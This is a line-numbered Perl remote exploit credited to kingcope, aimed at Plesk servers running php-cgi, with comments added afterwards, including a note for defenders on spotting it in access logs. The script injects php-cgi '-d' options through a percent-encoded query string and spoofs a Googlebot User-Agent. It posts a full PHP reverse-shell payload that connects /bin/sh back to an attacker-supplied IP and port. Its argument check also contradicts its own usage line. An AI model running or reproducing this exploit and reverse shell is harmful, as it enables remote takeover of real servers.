1 | #plesk remote exploit by kingcope | |
2 | #vaguely prettified by some guy | |
3 | #all your base belongs to me :> | |
4 | ||
5 | use strict; | |
6 | use warnings; | |
7 | use IO::Socket; | |
8 | use IO::Socket::SSL; | |
9 | use URI::Escape; | |
10 | ||
# Print the expected command line (four positional arguments) and exit.
# Because it calls exit, whoever invokes usage() never regains control.
11 | sub usage { | |
12 | print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit; | |
13 | } | |
14 | ||
# Positional arguments: target host, scheme, and the address/port of the
# listener that the PHP body built in main() connects back to.
15 | my ($target,$proto,$lip,$lport) = @ARGV; | |
16 | my $sock; | |
# Client socket for the chosen scheme. The port is fixed at 80 or 443; no
# port component of $target is honoured. Neither constructor's result is
# checked, so a failed connect leaves $sock undef and the print in main()
# fails at runtime under strict refs instead of reporting the connect error.
17 | if ($proto eq "http") { | |
18 | $sock = IO::Socket::INET->new( | |
19 | PeerAddr => $target, | |
20 | PeerPort => 80, | |
21 | Proto => 'tcp'); | |
22 | } | |
23 | elsif ($proto eq "https") { | |
# NOTE(review): no SSL_verify_mode / CA options are passed, so whether the
# server certificate is verified depends on the installed IO::Socket::SSL
# default — confirm before relying on it.
24 | $sock = IO::Socket::SSL->new( | |
25 | PeerAddr => $target, | |
26 | PeerPort => 443, | |
27 | Proto => 'tcp'); | |
28 | } | |
# Any other scheme: usage() prints help and exits; nothing below runs.
29 | else { | |
30 | &usage(); | |
31 | } | |
32 | ||
# Send one HTTP POST over the already-open $sock and echo the response.
# Reads the file-level $sock, $lip and $lport; returns nothing useful.
33 | sub main { | |
# Request body: a PHP script that connects back to $lip:$lport and wires
# /bin/sh to that connection. $lip and $lport are interpolated verbatim.
34 | my $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip = | |
35 | '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; | |
36 | \$error_a = null; \$shell = '/bin/sh -i'; \$daemon = | |
37 | 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = | |
38 | pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); | |
39 | exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { | |
40 | printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { | |
41 | printit(\"WARNING: Failed to daemonise. This is quite common and not | |
42 | fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, | |
43 | \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); | |
44 | exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => | |
45 | array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = | |
46 | proc_open(\$shell, \$descriptorspec, \$pipes);if | |
47 | (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); | |
48 | exit(1);}stream_set_blocking(\$pipes[0], | |
49 | 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], | |
50 | 0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) { | |
51 | printit(\"done.\"); break;} if | |
52 | (feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1], | |
53 | \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, | |
54 | \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) | |
55 | printit(\"SOCK READ\");\$input = fread(\$sock, | |
56 | \$chunk_size);if(\$debug) printit(\"SOCK: | |
57 | \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], | |
58 | \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = | |
59 | fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: | |
60 | \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], | |
61 | \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = | |
62 | fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: | |
63 | \$input\");fwrite(\$sock, | |
64 | \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print | |
65 | \"\$string\n\";}} | |
66 | ?>"; | |
# Query string: php-cgi option words ("-d key=value" pairs and "-n") joined
# by '+'. The "\0-\377" unsafe set makes uri_escape percent-encode every
# byte, so the words reach the server fully encoded.
67 | my $arguments = uri_escape("-d","\0-\377"). "+" . | |
68 | uri_escape("allow_url_include=on","\0-\377"). "+" . | |
69 | uri_escape("-d","\0-\377"). "+" . | |
70 | uri_escape("safe_mode=off","\0-\377"). "+" . | |
71 | uri_escape("-d","\0-\377"). "+" . | |
72 | uri_escape("suhosin.simulation=on","\0-\377"). "+" . | |
73 | uri_escape("-d","\0-\377"). "+" . | |
74 | uri_escape("disable_functions=\"\"","\0-\377"). "+" . | |
75 | uri_escape("-d","\0-\377"). "+" . | |
76 | uri_escape("open_basedir=none","\0-\377"). "+" . | |
77 | uri_escape("-d","\0-\377"). "+" . | |
78 | uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . | |
79 | uri_escape("-n","\0-\377"); | |
80 | my $path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377"); | |
# Defender note: in web-server access logs this request is a POST to
# /phppath/php whose query string is a run of percent-encoded "-d"/"-n"
# option words, sent with a User-Agent that imitates Googlebot. Alert on
# php-cgi option words appearing in query strings, not on the UA, which is
# trivially spoofed; the fix is server-side (do not expose php-cgi under a
# web path and keep it patched), not anything in this client.
# $ARGV[0] here is the same value as the file-level $target.
81 | print $sock "POST /$path?$arguments HTTP/1.1\r\n". | |
82 | "Host: $ARGV[0]\r\n". | |
83 | "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n". | |
84 | "Content-Type: text/plain\r\n". | |
85 | "Content-Length: ". length($pwn) ."\r\n\r\n". $pwn; | |
# Echo whatever the server sends back until it closes the connection.
86 | while(<$sock>){ | |
87 | print $_; | |
88 | }; | |
89 | } | |
90 | ||
# Entry point: check the argument count, then run main() once and exit.
# Both branches terminate the program (usage() exits itself).
91 | #arguably here is the actual main but yeah | |
92 | if (@ARGV != 3){ | |
93 | &usage(); | |
94 | } | |
95 | else { | |
96 | &main(); | |
97 | exit(); | |
98 | } |